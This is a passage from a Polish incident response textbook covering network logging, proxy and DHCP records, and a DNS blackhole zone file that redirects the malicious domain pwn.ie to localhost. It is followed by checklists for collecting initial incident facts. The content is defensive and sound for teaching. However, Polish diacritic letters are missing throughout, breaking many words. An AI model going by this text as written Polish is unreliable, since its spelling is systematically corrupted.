adnych znaczcych wynikw, masz zainstalowane wszystkie poprawki, zesp RI zrobi wszystkie
wiczenia, wszystkie dzienniki zostay przejrzane, a czonkowie zespou RI nudz si jak mopsy,
wtedy jak najbardziej pobaw si jeszcze we wdraanie puapek honeypot.
Dokumentacja
Wzrost firmy, fuzje i przejcia to czynniki, ktre bardzo utrudniaj utrzymanie dokadnych
i aktualnych schematw sieci. Zadanie to naley do pracownikw z dziaw IT i sieciowego.
Zespoy RI intensywnie korzystaj z tych dokumentw podczas ledztw w celu oceny ryzyka
i zakresu incydentu oraz ustalenia rodkw zaradczych.
Zesp RI powinien mie do dyspozycji szereg schematw reprezentujcych rodowisko
na rnych poziomach. Najwyszy poziom struktury sieci, obejmujcy bramy, poczenia MLPS,
tunele VPN i urzdzenia kontroli granic, rzadko ulega zmianom. Dlatego schematy tego poziomu
s najbardziej przydatne w pocztkowych fazach ledztwa. Z informacji tych korzysta si te przy
dokadnym rozmieszczaniu urzdze monitorowania sieci. Kolejne coraz bardziej szczegowe
schematy umoliwiaj zespoowi RI znalezienie potencjalnie zamanych systemw oraz ocenienie
ryzyka, jakie stanowi dla caego przedsibiorstwa. W pewnym momencie szczegowe schematy
ustpuj miejsca dobrze zorientowanemu administratorowi systemu.
Ponadto skadnikiem dobrego planu dokumentacji jest sposb przechowywania konfiguracji
rnych urzdze. Zesp RI musi mie dostp do konfiguracji sieci, np. routerw, zapr sieciowych
i przecznikw. Informacje te mog by przydatne, gdy padnie podejrzenie, e kto w nich szpera.
Dziki dostpowi do archiwum plikw konfiguracyjnych i dokumentacji z systemu kontroli zmian
mona atwo wykry wszelkie podejrzane modyfikacje.
Najwaniejsze jest to, i prowadzenie dokumentacji sprawia, e dua organizacja ma wiadomo
posiadanych rodkw i wykorzystywanych konfiguracji. Jeli poczy si to z kontrol zmian,
dokumentacja pozwoli zmniejszy ryzyko wystpienia niespodzianek podczas ewentualnego ledztwa.
Oprzyrzdowanie
Wczeniej opisalimy narzdzia dotyczce pojedynczych systemw i ich grup. Tutaj poszukamy
odpowiedzi na podobne pytanie, co wczeniej: Jakie informacje naley rejestrowa, co powinno
si przechwytywa lub zapisywa w inny sposb, aby jak najbardziej uatwi okrelenie, co si stao
w sieci?. Odpowied na to pytanie zaley od wielu cech organizacji i wykorzystywanych technologii.
Przypominamy, e bierzemy pod uwag nie tylko to, co powinno si przechwytywa dla typowych
celw zapewniania bezpieczestwa informatycznego, ale rwnie to, co powinno si rejestrowa
taktycznie podczas prowadzenia ledztwa. Oto najczciej wykorzystywane rda informacji
do rejestrowania.
Zapory sieciowe informacje o zdarzeniach powinny by zapisywane w miejscu, w ktrym
atwo bdzie je przeszukiwa i przechowywa. Podczas ledztwa zapory sieciowe mona
wykorzysta do powiadamiania o wykryciu okrelonych wskanikw zagroenia w ruchu
sieciowym.
Systemy wykrywania intruzw zesp RI jest przygotowany do analizowania ruchu
pod ktem obecnoci wskanikw zagroenia, wic powinien mie moliwo przegldania
alarmw i dodawania kolejnych wskanikw. Zewntrzne systemy wykrywania wama
i usugi monitorowania ruchu te s przydatne, jeli potrafi szybko reagowa i dostarczaj
przydatnych informacji.
Liczba dyrektorw dziaw informatycznych i zarzdzania systemami, ktrzy w toku

prowadzonych przez nas ledztw dowiadywali si o nowych serwerach, sieciach, a nawet
bramach internetowych, jest szokujca. Znamy przypadki, w ktrych hakerzy lepiej znali
moliwoci trasowania w przedsibiorstwie ni pracownicy. Hakerzy dowiedzieli si
o aktywnym monitorowaniu sieci w bramie w USA, wic aby unikn wykrycia, wstawili
statyczne trasy do niemonitorowanej bramy w Europie. W organizacji nikt nie wiedzia,
e niekompletne reguy filtrowania przepuszczay ruch, dopki wstawione trasy nie zostay
wykryte w kilku zamanych stacjach roboczych.
Systemy do przechwytywania caej treci od czasu do czasu moe by konieczne

przechwycenie caej sesji do analizy. Jeeli projektant sieci to przewidzia, wykonanie
takiego przechwycenia podejrzanego ruchu moe wymaga jedynie wczenia mechanizmu
SPAN lub funkcji dublowania portw (ang. port mirroring). Czasami wystarcza posiadanie
platformy gotowej do wdroenia podsuchu sieciowego.
Emitery NetFlow na wsplnych bramach i w wewntrznych przecznikach zbieraj dane
statystyczne o ruchu sieciowym dla kadego hosta lub dla kadego portu. Analiza iloci
danych i czstotliwoci ich przesyania moe doprowadzi do wykrycia systemw ze zamanymi
zabezpieczeniami oraz podpowiedzie zespoowi, w jaki sposb skradzione dane mog by
przenoszone po systemie.
Serwery proxy jeli cay ruch wychodzcy musi przechodzi przez serwery proxy
wymagajce uwierzytelniania, zesp RI moe wykorzysta dzienniki z tych serwerw
do analizy treci komunikacji, wykrycia ruchw danych, identyfikacji pocze ze znanymi
szkodliwymi systemami oraz wyledzi rdo da w urzdzeniach translacji adresw.
Majc do dyspozycji adresy wewntrzne i rekordy uwierzytelniania, bez trudu wykorzystasz
w odpowiedni sposb powiadomienia od FBI w stylu system z Twojej sieci wysa kod
rdowy Twojego produktu do znanego portalu przerzutowego o godzinie 16:07 w zesz
niedziel.
Usugi sieciowe
Projektujc lub modyfikujc sie pod ktem uatwienia ewentualnego ledztwa RI, naley uwzgldni
i rozway kilka usug. Oprcz opisanych wczeniej serwerw proxy, skonfiguruj systemy DNS
i serwery DHCP tak, aby umoliwiay rejestrowanie duych iloci informacji. W podsieciach,
w ktrych stacje robocze otrzymuj w dzieraw adresy, serwery DHCP powinny przechowywa
(albo przesya) dzienniki przydziaw przez dugi czas (przynajmniej jeden rok). Pamitaj: kiedy
przechowujesz take inne dzienniki przez duszy okres, przechwycone rdowe adresy IP mog
by bezwartociowe, jeli nie bdzie si dao zlokalizowa systemu, ktry mia przydzielony dany
adres w czasie trwania podejrzanej aktywnoci.
Implementowanie czarnej dziury DNS

Systemy DNS w Twoim rodowisku mog nalee do najbardziej przydatnych narzdzi do
ledzenia hakerw i udaremniania ich planw wykorzystania tylnych drzwi. Czarna dziura DNS
to przekierowanie caej poddomeny do nieistniejcego lub kontrolowanego adresu IP.
Powiedzmy np., e podejrzewasz domen pwn.ie o szkodliw dziaalno. Znalaze szkodliwe
oprogramowanie, ktre komunikuje si z t witryn, i chcesz uniemoliwi dalsze odnajdywanie
adresu tej nazwy domeny. W tym celu musisz wygenerowa plik strefy dla domeny i ustawi jego
wpisy na nieprawidowy adres. W gwnym rekordzie A czsto wpisuje si adres 127.0.0.1.
Przykadowo plik strefy blackhole.zone mgby mie nastpujc zawarto:
$TTL 3D
@ IN SOA company.com. root.company.com. (
2012010100 ; Serial
28800 ; Refresh
7200 ; Retry
604800 ; Expire
86400) ; Minimum TTL
NS company.com. ; Organization domain name
A 10.34.12.2 ; DNS server address
* IN A 127.0.0.1
W konfiguracji resolvera wszystkie zapytania do szkodliwej domeny powinny zosta przypisane

do tej strefy:
zone "pwn.ie" {type master; file "/etc/namedb/blackhole.zone";};
Wszystkie dania do poddomen domeny pwn.ie otrzymywayby w odpowiedzi adres 127.0.0.1.

Lepszym rozwizaniem byoby przekierowywanie tych da do specjalnego systemu do
przechwytywania szkodliwego ruchu. Skonfiguruj w systemie Unix rejestrujcy serwer sieciowy
i zainstaluj program do przechwytywania pakietw. Szkodliwe oprogramowanie moe prbowa
poczy si z Twoj faszyw stron przerzutow, dziki czemu dowiesz si, jakiego rodzaju
informacje interesuj intruza.
W INTERNECIE
Czarne dziury DNS w BIND i FreeBSD www.pintumbler.org/Code/dnsbl
Czarne dziury DNS w Microsoft DNS
http://cyber-defense.sans.org/blog/2010/08/31/windows-dns-server-blackhole-blacklist
I CO Z TEGO
Jak mwi stare przysowie, Lepiej dmucha na zimne ni si sparzy. W rozdziale tym
przedstawilimy sposoby przygotowania organizacji, zespou RI oraz infrastruktury organizacji
na jak najskuteczniejsze radzenie sobie z potencjalnymi incydentami. Jeli organizacja zna swoje
rodki i rozumie zagroenia oraz posiada dobrze wyposaony zesp RI i prawidowo zaprojektowan
architektur sieci, reakcja na incydent powinna by o wiele mniej bolesna. Nie naley jednak osiada
na laurach po zakoczeniu przygotowa warto przetestowa wdroone procedury i procesy
na sucho. Lepiej to zrobi, ni czeka, a wszystko wyjdzie w praniu podczas prawdziwego
incydentu. W nastpnym rozdziale przyjrzymy si krytycznym chwilom midzy wykryciem zdarzenia
a podjciem dziaa oraz zobaczymy, co mona zrobi, aby unikn kosztownych bdw.
PYTANIA
1. Wyjanij, w jaki sposb prosta usuga sieciowa typu DHCP moe sta si najwaniejszym
czynnikiem w ledztwie.
2. Omw niektre kopoty zwizane ze zlecaniem usug IT na zewntrz w odniesieniu
do prowadzenia ledztwa. Jak mona je rozwiza?
3. Dlaczego sprawne zarzdzanie rodkami ma fundamentalne znaczenie dla przygotowa
do incydentu?
4. Jakie narzdzia ledcze s uwzgldniane w sdzie? Wyjanij swoj odpowied.
5. Dlaczego scentralizowany system rejestracji dziennikw jest wany?
6. Co to jest czarna dziura DNS? Kiedy warto jej uy? Napisz plik strefy BIND przyjmujcy
wszystkie zapytania do szkodliwej domeny i odpowiadajcy adresem z puli RFC1918.
CZ II
Wykrywanie
incydentw
i ich charakterystyka
ROZDZIA 4.
Prawidowe
rozpoczynanie ledztwa
Gupiec pjdzie tam, gdzie nawet anioowie boj si zaglda.

Alexander Pope
W
iele organizacji stara si rozpocz ledztwo natychmiast po wykryciu incydentu.
Czasami rzeczywicie charakter zdarzenia usprawiedliwia szybkie dziaanie, ale
w wikszoci przypadkw naszym zdaniem lepiej wykona jeszcze jedn czynno,
aby skierowa dochodzenie na waciwe tory. Nieraz widzielimy, jak rozpoczynano ledztwo
przed znalezieniem potwierdzenia podstawowych faktw. Akcje takie s z reguy rozproszone
i kocz si zmarnowaniem czasu oraz zasobw.
Czasami ludzie ekscytuj si nowymi informacjami i dziaaj pod wpywem chwili, a przecie
nowe informacje zawsze powinno si logicznie oceni na podstawie zdrowego rozsdku i wasnego
dowiadczenia. Zastanwmy si np., co si stao podczas huraganu Sandy w padzierniku 2012 roku.
Pewna liczba osb opublikowaa w internecie faszywe informacje z ostatniej chwili, e doszo
do powodzi na parkiecie giedy w Nowym Jorku. Cho taka powd rzeczywicie bya moliwa,
nikt nie zastanowi si, czy rdo informacji i cay raport s wiarygodne. Media i opinia publiczna
podchwyciy temat i przez pewien czas panowao przekonanie, e do tego zdarzenia naprawd doszo.
Analogiczne sytuacje dostrzegamy w wiecie reakcji na incydenty bezpieczestwa ledczy
czasami reaguj na napywajce informacje bez uprzedniego zastanowienia si. Gdy np. system
wykrywania zgosi zdarzenie, to czy od razu rozpoczynasz akcj, czy prbujesz zweryfikowa te
informacje? Systemy wykrywania mog le reprezentowa lub pomija zdarzenia albo pewne
zwizane z nimi szczegy. aden system nie jest idealny. Dlatego musisz sta na stray midzy
zdarzeniami i ledztwami. Aby dobrze wykona swoje zadanie, zrb oglny przegld tego, co si
stao, a nastpnie zbierz i zweryfikuj wstpne fakty. W ten sposb poznasz kontekst wydarze.
Nastpnie naley zdecydowa, co jest odpowiednie i moliwe do przeprowadzenia skutecznego
ledztwa. I oczywicie proces ten musi zosta przeprowadzony szybko, poniewa na szali le
bezpieczestwo organizacji, dane elektroniczne i reputacja.
ZBIERANIE WSTPNYCH FAKTW

Podczas ledztw nieraz napotykalimy osoby, ktre posugiway si modnymi sowami, mwiy
niezrozumiale albo nie podaway szczegw. W filmie Wolny dzie Ferrisa Buellera pady sowa,
ktre doskonale ilustruj, z czym moesz mie do czynienia, gdy bdziesz prbowa ustali fakty
podczas incydentu. W filmie tym bohaterka o imieniu Simone wyjania, dlaczego Buellera nie ma
na zajciach: Dziewczyna brata chopaka siostry mojego najlepszego kolegi rozmawiaa z gociem,
ktry go zna i ktry chodzi z dziewczyn, ktra widziaa Ferrisa, jak straci przytomno w 31 Flavours
zeszego wieczora. To chyba co powanego. Kiedy syszysz co takiego, od razu wiesz, e bdziesz
musia ustali fakty.
ROZDZIA 4. PRAWIDOWE ROZPOCZYNANIE LEDZTWA 105
Kilka sw o strefach czasowych
Skoro mowa o czasie, zauwaylimy, e wiele firm w dokumentacji posuguje si czasem

lokalnym. Moe jest to wygodne w chwili pisania dokumentw, ale podczas ledztwa sprawia
wiele problemw. Gdy np. trzeba skorelowa zdarzenia, ktre miay miejsce w wielu strefach
czasowych, przeliczenia czasu midzy strefami mog by problematyczne. Niektre strefy nie
reprezentuj rwnych godzin (np. indyjska strefa czasowa to UTC+5:30, w czci Australii
obowizuje strefa UTC+8:45), a w innych zmienia si czas na letni i zimowy. W niektrych
miejscach stref czasowych obowizuj odmienne zasady, np. w stanie Arizona przez cay rok
obowizuje czas MST (ang. Mountain Standard Time). Aby zminimalizowa kopoty zwizane
z przeliczeniami czasu, zalecamy wybranie jednej strefy czasowej i posugiwanie si ni we
wszystkich dokumentach. W naszej firmie posugujemy si czasem UTC (ang. Coordinated
Universal Time). Moe si to wydawa trudne, ale wystarczy wszystko dobrze zaplanowa
i sprawa staje si atwa. Niektre narzdzia ledcze domylnie prezentuj czas UTC lub
przynajmniej maj opcj pozwalajc ustawi t stref czasow. A jeli nie, zawsze moesz
zmieni ustawienia czasu w analizowanych systemach. Ponadto nasi ledczy czsto dodaj
do swoich systemw operacyjnych dodatkowy zegar UTC. Jeeli w Twojej firmie znajduje si
dzia ds. bezpieczestwa, dobrym pomysem jest zawieszenie zegara z czasem UTC na cianie.
Trzeba si do tego przyzwyczai, ale posugujc si jedn stref czasow, oszczdzisz sobie
wielu kopotw podczas pracy.
Do rozpoczcia ledztwa konieczne jest ustalenie pocztkowych faktw, wic trzeba postara
si, aby byy jak najprecyzyjniejsze. Ponadto naley zgromadzi dodatkowe informacje pozwalajce
okreli kontekst zdarzenia. Przykadowo adres IP jest o wiele bardziej przydatny, jeli wiadomo,
do jakiego systemu naley i jak rol w organizacji ten system peni. Ponadto czas zdarzenia nie jest
zbyt przydatny, jeli nie znamy strefy czasowej. Bez takich danych kontekstowych atwo wycign
bdne wnioski o tym, co si stao.
Z czasem weryfikacja faktw i ustalanie kontekstu wchodzi czowiekowi w krew. Niektrzy
czytelnicy pewnie maj ju na tym polu spore dowiadczenie, a inni mog potrzebowa paru
wskazwek. Dlatego poniej przedstawiamy kilka porad i technik, takich jak prowadzenie
kontrolnych list czynnoci do wykonania, metody sporzdzania notatek oraz sposoby
chronologicznego zapisywania informacji o atakach.
Listy kontrolne
W tym punkcie opisujemy pi list kontrolnych dotyczcych takich obszarw jak zestawienie
informacji o incydencie, sposb wykrycia incydentu, szczegowe dane pojedynczego systemu,
szczegowe dane sieci oraz szczegowe informacje o szkodliwym oprogramowaniu. Oczywicie
s te inne obszary, ktre mona by byo w ten sposb opisa, ale naszym zdaniem te s najwaniejsze
i najbardziej przydatne w ledztwie. Ponadto listy kontrolne nie musz by wyczerpujce.
Jeli trzeba, mona co doda, usun lub zmieni, gdy ma to uzasadnienie w przypadku
Twojej organizacji. Te i inne listy kontrolne zamiecilimy w dodatku B pod adresem
ftp://ftp.helion.pl/przyklady/incbez.zip.
Zalecamy zapisywanie wszystkich informacji we wasnym systemie dokumentacji incydentw,
nawet jeli dane znajduj si w innych aplikacjach w organizacji. Istnieje ryzyko, e w innych
systemach wystpi bdy i nie ma gwarancji, e dane zostan zachowane. Zwr szczegln uwag
na sowo wasny w pierwszym zdaniu tego akapitu. System zarzdzania incydentami musi by
absolutnie niezaleny od jakichkolwiek zasobw IT organizacji oraz odpowiednio zabezpieczony.
Zasada ta dotyczy wikszoci zasobw informatycznych przydzielonych zespoowi RI. Wyobra
sobie, e ju na samym pocztku zostay zamane zabezpieczenia Twojej domeny. Niestety czsto
tak wanie si dzieje.
System dokumentacji moe by prosty, jak np. udziay plikowe o ograniczonym i kontrolowanym
dostpie z moliwoci dodawania notatek przez wszystkich czonkw zespou, lub bardziej
skomplikowany, jak system biletowy typu Request Tracker for Incident Response (RTIR). Niestety
wiele aktualnie dostpnych systemw do zarzdzania danymi nie nadaje si dla zespow RI lub s
tak elastyczne, e niewiele firm ma czas na ich waciwe skonfigurowanie.
Lista kontrolna zestawienia informacji o incydencie

Pierwsza lista kontrolna, jak naley wypeni, suy do zebrania podstawowych informacji
o incydencie, wic nazywa si List kontroln podsumowania incydentu. Jest ona przeznaczona
do zapisywania oglnych informacji, dziki ktrym mona oglnie zorientowa si, co si stao,
i wytypowa obszary, w jakich protok postpowania wymaga uwagi.
Data i godzina zgoszenia raportu o incydencie. Zapisz dat i godzin, o ktrej
indywidualny lub automatyczny system zgosi problem zespoowi RI.
Data i godzina wykrycia incydentu. Zazwyczaj incydent jest zgaszany po jakim czasie
od momentu wykrycia. Dlatego nie zapomnij zapisa, kiedy dokadnie zdarzenie to
zostao wykryte.
W terenie
Wezwano nas do pomocy przy kilku incydentach, w ktrych hakerzy mieli swobodny dostp
do kadego systemu w firmowym lesie Microsoft Active Directory. Zazwyczaj atwo zdoby
dane do kont uytkownikw na poziomie domeny i usug. Oznaczao to, e zagroone byy
take serwery poczty, zapory sieciowe, serwery baz danych itd. Komunikacja midzy czonkami
zespou RI oraz z kierownictwem i dziaem prawnym bya cile monitorowana. Na tym etapie
kada ofiara otrzymuje nastpujc lekcj: zesp ledczy musi chodzi wasnymi ciekami,
aby zagwarantowa bezpieczestwo, a posiadanie jednolitej infrastruktury od jednego producenta
jest niebezpieczne.
Informacje kontaktowe osoby, ktra zapisaa dan informacj.

Dane kontaktowe osoby, ktra zgosia incydent.
Informacje kontaktowe osoby, ktra wykrya incydent. Jeeli powiadomienie nadeszo
z zewntrz, naley zapisa wszystkie szczegy i zachowa zapis rozmowy.
Rodzaj incydentu. Zdefiniuj kategorie pozwalajce okrela typy zdarze masowe
szkodliwe oprogramowanie, prba phishingu, nieudane prby logowania, dostp bez
autoryzacji itd.
Typ dotknitych zasobw. Czasami w raporcie o wykryciu podawane s informacje o tym,
jakie dane lub zasoby mogy zosta dotknite. Zachowaj wszystkie otrzymane informacje,
niezalenie od tego, czy s to dane zwizane z informacjami o kartach kredytowych, czy
o rysunkach CAD przedstawiajcych yroskop projektowanego przez Ciebie pocisku
rakietowego. Informacje takie uwiarygodniaj powiadomienie i pomagaj okreli
zakres zdarzenia.
Sposb wykrycia incydentu. Zanotuj, jak metod wykryto incydent, np. czy byo to
powiadomienie od programu antywirusowego, alarm systemu detekcji wama,
czy zgoszenie przez uytkownika podejrzanej aktywnoci w systemie.
Identyfikator i lokalizacja komputerw objtych zdarzeniem. Identyfikator powinien
pozwala jednoznacznie zidentyfikowa system np. adres IP moe nie by odpowiedni
ze wzgldu na dzierawienie adresw DHCP. Zazwyczaj najlepsza jest nazwa hosta lub
numer znacznika.
Kto wchodzi do systemu od czasu wykrycia zdarzenia? Informacja ta jest potrzebna na
wypadek, gdyby ledczy potrzebowali szczegowych informacji na temat poczyna tych osb.
Czasami pracownicy z dziau IT lub inni robi rne rzeczy, ktre wydaj si im pomocne,
a w rzeczywistoci s trudne do odrnienia od szkodliwych dziaa.
Kto wie o incydencie?
Czy incydent trwa?
Czy wymagane jest przechowywanie wiedzy o incydencie w taki sposb, aby dostarcza
tylko tych informacji, ktre s w danym momencie potrzebne?
Po wypenieniu Listy kontrolnej podsumowania incydentu mona przej do szczegw
dotyczcych konkretnych obszarw. Kolejno wypeniania tych list powinna by ustalona zgodnie
z aktualnym zapotrzebowaniem. Ewentualnie mona te zajmowa si wicej ni jedn list naraz.
Opisujemy je tu w takiej kolejnoci, w jakiej ich zazwyczaj uywamy.
Lista kontrolna wykrycia incydentu

Nastpna lista kontrolna suy do zbierania dodatkowych informacji o sposobie wykrycia
incydentu i samych systemach detekcji incydentw. Rozwizalimy wiele spraw poprzez jedynie
skrupulatne zgromadzenie i przeanalizowanie szczegw dotyczcych wykrycia zdarzenia.
Okazao si, e tylko co le zinterpretowano i w rzeczywistoci do adnego incydentu nie doszo.
Naszym zdaniem czas powicony na weryfikacj zdarzenia to dobra inwestycja.
Czy zdarzenie zostao wykryte przez proces automatyczny, czy rczny? Czy incydent zosta
wykryty przez automat, czy czowieka? Informacja o wykryciu zdarzenia moe te pochodzi
ze rda zewntrznego, wic wiedza o tym, czy alarm wszcz automatyczny system,
czy analityk na podstawie zebranych danych, jest bardzo wana.
Jakie informacje wchodziy w skad wstpnego wykrycia? Zapisz szczegy przekazane
w pierwszym powiadomieniu o wykryciu zdarzenia. Jeli byo to powiadomienie alarmowe,
czy masz jego kopi? Jeli zdarzenie wykrya osoba, czy porozmawiae si z ni w celu
spisania zezna? Bd sceptyczny i nie zapomnij rzuci okiem na surowe dane, aby zdoby
potwierdzenie, e to, co syszysz lub widzisz, jest prawd. Zadbaj o prawidowe przechowywanie
otrzymywanych informacji (temat ten opisujemy w rozdziaach od 7. do 10.). Jak ju pisalimy,
jeeli dane nie s zbyt obszerne, zesp RI powinien zaj si ich przechowywaniem.
Z jakich rde pochodz dane, dziki ktrym udao si wykry zagroenie? Jeli rdem
bya osoba lub grupa osb, zapisz ich informacje kontaktowe. Jeeli rdem by automat
lub grupa automatw, zapisz szczegowe informacje o kadym z nich. Zanotuj te stref
czasow zapisan przez automatyczny system.
Czy kto sprawdzi prawidowo danych rdowych? Jeli tak, to kto? Jeeli w wykryciu
zdarzenia miaa udzia osoba, czy kto zweryfikowa zastosowane metody i analizowane
dane? Jeeli wykrycie zawdziczasz automatycznemu systemowi, czy kto zweryfikowa
kryteria i dane, na podstawie ktrych zostao wygenerowane zgoszenie zagroenia?
Czy dane rdowe s zapisywane? W zalenoci od systemu i zastosowanej metody,
dane dotyczce wykrycia mog nie by zapisywane automatycznie lub mog by usuwane
z systemw po okrelonej liczbie godzin lub dni. Dlatego naley zadba o to, by potrzebne
informacje nie zostay skasowane.
Ile czasu dziaaj rda wykrycia i kto je uruchomi? Czasami okazuje si, e system
detekcji zagroe zosta wdroony niedawno i generuje faszywe alarmy lub jego wyniki s
le interpretowane z powodu braku dowiadczenia. Sprawd, ile czasu dziaa kady system
i kto go obsuguje.
Jak czsto pojawiaj si alarmy i bdy? Porozmawiaj z opiekunami systemu i przejrzyj
raporty. Dowiedz si, jak czsto maj miejsce wykrycia tego typu. Dowiedz si, jaka jest
czstotliwo wystpowania bdw.
Czy zmienio si cokolwiek zwizanego ze rdami danych? Czasami okazuje si, e
administrator zmieni konfiguracj systemu albo zainstalowa jakie uaktualnienia. Naley
porozmawia z osob odpowiedzialn za systemy rde danych i dowiedzie si, czy ostatnio
byy prowadzone jakie czynnoci serwisowe. Czasami maj one niepodane skutki.
Zbieranie dodatkowych danych

Jeeli informacje o wykrytym zagroeniu wydaj si dokadne i spjne, nastpnym krokiem jest
zebranie dodatkowych danych o konkretnych elementach odkrycia. Naley dowiedzie si wicej
o poszczeglnych systemach, sieciach i potencjalnie szkodliwych plikach. Ponadto jeli uznasz to
za suszne, dogbnie zbadaj wybrane punkty z Listy kontrolnej podsumowania incydentu.
Szczegowe informacje o poszczeglnych systemach

Postaraj si zdoby wymienione poniej informacje o kadym z systemw zaangaowanych
w zdarzenie. Nie naley opisywa grup systemw w jednym dokumencie, poniewa atwo
przeoczy wane szczegy, jeli nie zadaje si pyta w odniesieniu do konkretnego systemu.
Fizyczna lokalizacja dodaj informacje, za pomoc ktrych osoby spoza Twojej
organizacji bez trudu okrel fizyczn lokalizacj systemu, np. peny adres, numer budynku,
numer pitra, numer pokoju lub numer szafki.
Numer znacznika rodka powinien to by numer wykorzystywany przez pracownikw
z dziau IT do rejestracji zasobw. Czasami jest to numer seryjny systemu, a czasami numer
przypisywany przez jak aplikacj.
Marka i model systemu marka i numer modelu s wane, poniewa informacje te
umoliwiaj zaplanowanie czynnoci do podjcia. Jeeli np. jest to rzadko uywany system
o maej liczbie portw wejcia i wyjcia, fakty te naley uwzgldni przy planowaniu
sposobw zachowania dowodw.
Zainstalowany system operacyjny take typ i wersja systemu operacyjnego s bardzo
wane w procesie planowania akcji. Moe si zdarzy, e w Twoim zespole nie bdzie osoby
znajcej si na danym systemie lub nie bdzie narzdzi do pracy w nim.
Gwna funkcja systemu znajomo gwnej funkcji systemu pomaga ustali kontekst.
Czy jest to serwer sieciowy lub serwer baz danych? Jakie strony internetowe lub bazy danych
s na nim hostowane? Czy jest to czyj laptop? Czyj? W ktrym dziale organizacji ta osoba
pracuje? W przypadku laptopa inyniera podjto by inne kroki ni w przypadku serwera
z dziau rachunkowoci.
Odpowiedzialny administrator lub uytkownik jeli musisz zapisa dowody, moesz
potrzebowa pomocy administratora systemu. W pewnym momencie bdzie trzeba go
powiadomi o tym, co si dzieje oczywicie jeli nie jest podejrzanym w ledztwie.
Przydzielone adresy IP niektre serwery maj wiele interfejsw zarwno fizycznych, jak
i wirtualnych. Zapisz biecy adres IP i zanotuj, czy adres ten pochodzi z przydziau przez
DHCP, czy jest nadany statycznie. Nastpnym krokiem mogoby by zdobycie dziennikw
DHCP.
Nazwa hosta i domena systemu w systemach Microsoft Windows naley zanotowa
take nazw grupy roboczej lub domeny. Jednym z dalszych krokw postpowania moe
by przejrzenie dziennikw wygenerowanych przez domen.
Krytyczne informacje przechowywane w systemie to zaley od podstawowej funkcji
systemu. Jeeli jest on repozytorium kodu rdowego, naley dowiedzie si, jakie projekty
s w nim przechowywane. Jeeli system jest laptopem pracownika, trzeba sprawdzi,
czym zajmuje si ten pracownik. Moe to by np. kto z dziau zasobw ludzkich i w jego
komputerze mog znajdowa si dane osobowe pracownikw lub inne poufne informacje
albo moe to by inynier przechowujcy w komputerze schematy jakiego programu.
Czy istniej kopie zapasowe systemu okresowe zrzuty systemu mog zawiera wiele
cennych dla ledztwa informacji. Dlatego naley dowiedzie si, czy istniej kopie zapasowe
systemu, w jakim czasie zostay zrobione, kiedy zostan usunite oraz jak zdoby do nich dostp.
Czy system nadal jest podczony do sieci jeeli system zosta odczony, to gdzie jest teraz?
Jak mona uzyska do niego dostp?
Lista wykrytych szkodliwych programw, od rozpoczcia ledztwa do pocztku danych
w dziennikach zapisz szczegowe informacje o wykrytym szkodliwym oprogramowaniu,
dat, godzin, nazw pliku, katalog oraz typ i rodzin zarejestrowane przez program
antywirusowy. Dowiedz si, czy szkodliwe oprogramowanie zostao wysane do producenta
programu antywirusowego lub innych zewntrznych systemw skanowania. Jeeli ludzie
spoza zespou RI maj kopie tego programu, naley ich ostrzec i poprosi o kopi.
Lista krokw naprawczych, ktre zostay ju podjte czy uytkownik usun lub
skopiowa pliki? Administrator te mg wprowadzi zmiany w konfiguracji lub zresetowa
hasa. Wszelkie zmiany w systemie, to kto ich dokona oraz kiedy to zrobi, naley
udokumentowa. Kilka razy zdarzyo nam si, e nie moglimy odrni aktywnoci hakera
od aktywnoci pracownika, poniewa przeplatay si i nie byo adnych dodatkowych
informacji, ktre pozwoliyby je rozrni.
Jeeli zachowywane s jakie dane, jaki proces jest wykorzystywany i gdzie informacje te
s skadowane wielokrotnie wsppracowalimy z pracownikami, ktrzy byli bardzo
pomocni i prbowali zachowywa informacje, ale nie znali zasad utrwalania dowodw
na potrzeby ledztwa. Dlatego naley dowiedzie si, jakie informacje i w jaki sposb s
zapisywane. Niech wszyscy zaangaowani w spraw pracownicy zostan przeszkoleni
pod ktem sporzdzania dokumentacji na potrzeby dochodzenia.
Szczegowe informacje na temat sieci

Dane dotyczce sieci s rwnie wane nawet wwczas, gdy pocztkowo wydaje si, e nie bd
do niczego potrzebne. Oto informacje, ktre powinno si przynajmniej zarejestrowa.
Lista wszystkich zewntrznych szkodliwych adresw IP i nazw domen zaangaowanych
w zdarzenie zapisz wszystkie adresy IP i nazwy domen lub nazwy hostw zaangaowanych
w incydent. Sprawd ich tosamo w usugach whois.
Czy sie jest monitorowana jeeli administratorzy sieci wdroyli urzdzenia do
przechwytywania ruchu sieciowego, sprawd, kto si tym zajmuje, gdzie jest to robione
(fizycznie i logicznie), gdzie s przechowywane dane oraz kto ma do nich dostp. Wyjanij
reguy filtrowania stosowane w przechwytywaniu oraz to, czy zapisywana jest caa tre
sesji, czy tylko nagwki.
Lista podjtych czynnoci naprawczych dowiedz si, czy zastosowano np. blokowanie
adresw IP lub przekierowywanie okrelonych nazw domen do czarnej dziury.
Sprawd, kiedy wdroono takie rozwizania.
Jeeli zachowywane s jakie dane, jak si to robi i gdzie si przechowuje te informacje

podobnie jak w przypadku pojedynczych systemw, zadbaj o prawidow obsug
i rejestracj wszystkich danych zwizanych z odkryciem w sieci.
Aktualizacje schematw sieci i konfiguracji zdobd aktualne schematy sieci
i konfiguracje, ktre mogy si zmieni od czasu wstpnych wicze przygotowawczych
do potencjalnego incydentu.
Szczegowe informacje o szkodliwym oprogramowaniu

A to informacje, ktre naley zapisa w odniesieniu do kadego szkodliwego pliku wykrytego
w zwizku z incydentem.
Data i godzina wykrycia zdarzenia.
Sposb wykrycia szkodliwego programu.
Lista systemw, w ktrych szkodliwy program zosta znaleziony.
Nazwa szkodliwego pliku oraz nazwa katalogu, w ktrym si znajdowa.
Ustalenia mechanizmu wykrywania, np. nazwa i rodzina, do ktrej naley szkodliwy plik.
Czy szkodliwy program podczas procesu RI jest aktywny i czy s dostpne aktywne
poczenia sieciowe.
Czy zostaa zachowana kopia szkodliwego pliku, rcznie lub w procesie kwarantanny.
Stan analizy. Czy szkodliwy program zosta przeanalizowany pod ktem sieciowych
i hostowych wskanikw zagroenia?
Czy szkodliwy program zosta wysany na zewntrz, np. przez automatyczny proces
lub bezporednio przez pracownika?
Odpowiedzi na wiele z powyszych pyta mona znale na pocztku ledztwa. Niektre
jednak najprawdopodobniej bd musiay poczeka duej na wyjanienie lub w ogle pozosta bez
odpowiedzi. Najwaniejszym oglnym celem na tym etapie ledztwa jest zebranie faktw i informacji
dotyczcych kontekstu zdarzenia. Gdy dane te zostan odpowiednio zabezpieczone, bd podstaw
caego postpowania oraz podejmowania jak najlepszych decyzji.
ROBIENIE NOTATEK NA TEMAT SPRAWY

